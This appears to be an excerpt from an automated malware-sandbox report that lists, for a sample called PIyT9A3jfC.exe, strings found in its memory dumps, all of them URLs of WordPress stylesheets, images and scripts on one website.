                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/uploads/elementor/css/global.css?ver=1664959878
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/uploads/elementor/css/post-1009.css?ver=1684171764
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/uploads/elementor/css/post-1185.css?ver=1678274495
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/uploads/elementor/css/post-17.css?ver=1664959878
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/uploads/favicon.png
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/uploads/the7-css/compatibility/wc-dt-custom.css?ver=899328ee298e
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/uploads/the7-css/css-vars.css?ver=899328ee298e
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/uploads/the7-css/custom.css?ver=899328ee298e
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/uploads/the7-css/media.css?ver=899328ee298e
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/uploads/the7-css/post-type-dynamic.css?ver=899328ee298e
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-includes/css/dist/block-library/style.min.css?ver=5.8
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2
